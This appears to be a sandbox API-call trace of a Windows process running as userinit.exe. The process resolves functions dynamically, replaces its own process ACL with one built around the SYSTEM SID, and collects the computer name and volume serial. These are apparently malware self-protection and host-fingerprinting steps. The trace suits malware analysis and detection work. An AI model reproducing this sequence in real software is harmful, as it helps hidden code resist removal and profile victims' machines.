[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff880, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x28ff880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0180.592] IsValidSid (pSid=0x28ff880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0180.592] ConvertSidToStringSidA () returned 0x1
[0180.592] LocalFree (hMem=0x216f58) returned 0x0
[0180.592] LocalFree (hMem=0x216f40) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff90c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x28ff90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0180.592] IsValidSid (pSid=0x28ff90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0180.592] ConvertSidToStringSidA () returned 0x1
[0180.592] LocalFree (hMem=0x216f58) returned 0x0
[0180.592] LocalFree (hMem=0x216f40) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff998, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x28ff998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0180.592] IsValidSid (pSid=0x28ff998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0180.593] ConvertSidToStringSidA () returned 0x1
[0180.593] LocalFree (hMem=0x216f58) returned 0x0
[0180.593] LocalFree (hMem=0x216f40) returned 0x0
[0180.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.593] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0180.593] GetCurrentThread () returned 0xfffffffe
[0180.593] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.593] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0180.593] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x6ed4c | out: TokenHandle=0x6ed4c*=0x27d3756) returned 0
[0180.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.593] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0180.593] GetCurrentProcess () returned 0xffffffff
[0180.593] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.594] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0180.594] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x28ffa3c | out: TokenHandle=0x28ffa3c*=0x1d0) returned 1
[0180.594] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.594] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0180.594] MapGenericMask (in: AccessMask=0x6ebc4, GenericMapping=0x6ebc8 | out: AccessMask=0x6ebc4)
[0180.594] MapGenericMask (in: AccessMask=0x6ecf8, GenericMapping=0x6ecfc | out: AccessMask=0x6ecf8)
[0180.594] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.594] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0180.595] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6ed0c | out: TokenInformation=0x0, ReturnLength=0x6ed0c) returned 0
[0180.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.595] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0180.595] GetLastError () returned 0x7a
[0180.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.595] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0180.595] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x210780, TokenInformationLength=0x24, ReturnLength=0x6ed30 | out: TokenInformation=0x210780, ReturnLength=0x6ed30) returned 1
[0180.595] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffab0, pSourceSid=0x210788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x28ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0180.595] IsValidSid (pSid=0x28ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0180.595] ConvertSidToStringSidA () returned 0x1
[0180.595] LocalFree (hMem=0x209e80) returned 0x0
[0180.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.595] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0180.595] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffb34, pSourceSid=0x28ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x28ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0180.595] IsValidSid (pSid=0x28ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0180.596] ConvertSidToStringSidA () returned 0x1
[0180.596] LocalFree (hMem=0x209e80) returned 0x0
[0180.596] IsValidSid (pSid=0x28ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0180.596] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.596] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0180.596] CloseHandle (hObject=0x1d0) returned 1
[0180.596] ConvertStringSidToSidA () returned 0x1
[0180.596] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffa54, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x28ffa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0180.596] IsValidSid (pSid=0x28ffa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0180.596] ConvertSidToStringSidA () returned 0x1
[0180.596] LocalFree (hMem=0x216f58) returned 0x0
[0180.596] LocalFree (hMem=0x216f40) returned 0x0
[0180.596] ConvertStringSidToSidA () returned 0x1
[0180.596] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffae0, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x28ffae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0180.596] IsValidSid (pSid=0x28ffae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0180.596] ConvertSidToStringSidA () returned 0x1
[0180.596] LocalFree (hMem=0x216f58) returned 0x0
[0180.596] LocalFree (hMem=0x216f40) returned 0x0
[0180.596] ConvertStringSidToSidA () returned 0x1
[0180.596] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffbfc, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x28ffbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0180.596] IsValidSid (pSid=0x28ffbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0180.596] ConvertSidToStringSidA () returned 0x1
[0180.596] LocalFree (hMem=0x216f58) returned 0x0
[0180.596] LocalFree (hMem=0x216f40) returned 0x0
[0180.596] ConvertStringSidToSidA () returned 0x1
[0180.596] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffc8c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x28ffc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0180.596] IsValidSid (pSid=0x28ffc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0180.596] ConvertSidToStringSidA () returned 0x1
[0180.596] LocalFree (hMem=0x216f58) returned 0x0
[0180.597] LocalFree (hMem=0x216f40) returned 0x0
[0180.597] ConvertStringSidToSidA () returned 0x1
[0180.597] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffd1c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x28ffd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0180.597] IsValidSid (pSid=0x28ffd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0180.597] ConvertSidToStringSidA () returned 0x1
[0180.597] LocalFree (hMem=0x216f58) returned 0x0
[0180.597] LocalFree (hMem=0x216f40) returned 0x0
[0180.597] GetCurrentProcessId () returned 0x1c0
[0180.597] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x1c0) returned 0x1d0
[0180.597] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.597] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0180.597] GetSecurityInfo () returned 0x0
[0180.600] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.600] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0180.600] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x210f28, pControl=0x6ead2, lpdwRevision=0x6eacc | out: pControl=0x6ead2, lpdwRevision=0x6eacc) returned 1
[0180.600] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.601] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0180.601] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x210f28, pOwner=0x6eac8, lpbOwnerDefaulted=0x6eabc | out: pOwner=0x6eac8*=0x0, lpbOwnerDefaulted=0x6eabc) returned 1
[0180.601] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.601] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0180.601] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x210f28, pGroup=0x6eac8, lpbGroupDefaulted=0x6eabc | out: pGroup=0x6eac8*=0x0, lpbGroupDefaulted=0x6eabc) returned 1
[0180.601] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.601] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0180.601] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x210f28, lpbDaclPresent=0x6eac0, pDacl=0x6eab4, lpbDaclDefaulted=0x6eabc | out: lpbDaclPresent=0x6eac0, pDacl=0x6eab4, lpbDaclDefaulted=0x6eabc) returned 1
[0180.601] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.602] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0180.602] IsValidAcl (pAcl=0x210f3c) returned 1
[0180.602] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.602] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0180.602] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x0, pAce=0x6e954 | out: pAce=0x6e954*=0x210f44) returned 1
[0180.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ffe74, pSourceSid=0x210f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x28ffe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.602] IsValidSid (pSid=0x28ffe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.602] ConvertSidToStringSidA () returned 0x1
[0180.602] LocalFree (hMem=0x217018) returned 0x0
[0180.602] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x1, pAce=0x6e954 | out: pAce=0x6e954*=0x210f5c) returned 1
[0180.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28fff60, pSourceSid=0x210f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x28fff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.602] IsValidSid (pSid=0x28fff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.602] ConvertSidToStringSidA () returned 0x1
[0180.602] LocalFree (hMem=0x217018) returned 0x0
[0180.602] GetAce (in: pAcl=0x210f3c, dwAceIndex=0x2, pAce=0x6e954 | out: pAce=0x6e954*=0x210f70) returned 1
[0180.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28f29c0, pSourceSid=0x210f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x28f29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0180.602] IsValidSid (pSid=0x28f29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0180.602] ConvertSidToStringSidA () returned 0x1
[0180.602] LocalFree (hMem=0x217018) returned 0x0
[0180.602] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.603] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0180.603] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x210f28, lpbSaclPresent=0x6eac4, pSacl=0x6eab8, lpbSaclDefaulted=0x6eabc | out: lpbSaclPresent=0x6eac4, pSacl=0x6eab8, lpbSaclDefaulted=0x6eabc) returned 1
[0180.603] LocalFree (hMem=0x210f28) returned 0x0
[0180.603] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.603] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.603] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0180.603] GetLengthSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0180.603] GetLastError () returned 0x0
[0180.603] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.603] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0180.603] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.603] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0180.603] InitializeAcl (in: pAcl=0x217fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x217fa8) returned 1
[0180.603] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.604] GetLengthSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0180.604] GetLastError () returned 0x0
[0180.604] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.604] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.604] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0180.604] SetLastError (dwErrCode=0x0)
[0180.604] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.604] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0180.604] GetSidSubAuthorityCount (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x28ff615
[0180.604] GetLastError () returned 0x0
[0180.604] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.604] SetLastError (dwErrCode=0x0)
[0180.604] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.604] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0180.604] GetSidIdentifierAuthority (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x28ff616
[0180.605] GetLastError () returned 0x0
[0180.605] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.605] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.605] SetLastError (dwErrCode=0x0)
[0180.605] GetSidSubAuthorityCount (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x28ff615
[0180.605] GetLastError () returned 0x0
[0180.605] SetLastError (dwErrCode=0x0)
[0180.605] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.605] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0180.605] GetSidSubAuthority (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x28ff61c
[0180.605] GetLastError () returned 0x0
[0180.605] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.605] GetLengthSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0180.605] GetLastError () returned 0x0
[0180.605] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.605] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0180.605] AddAce (in: pAcl=0x217fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x202f90, nAceListLength=0x14 | out: pAcl=0x217fa8) returned 1
[0180.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.606] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0180.606] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0180.606] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0180.606] SetSecurityInfo () returned 0x0
[0180.606] CloseHandle (hObject=0x1d0) returned 1
[0180.606] GetComputerNameA (in: lpBuffer=0x28ffd84, nSize=0x6ed8c | out: lpBuffer="CRH2YWU7", nSize=0x6ed8c) returned 1
[0180.606] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.606] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.607] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec80, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.607] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.607] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec80, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.607] VirtualAlloc (lpAddress=0x2900000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000
[0180.607] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.608] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.608] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
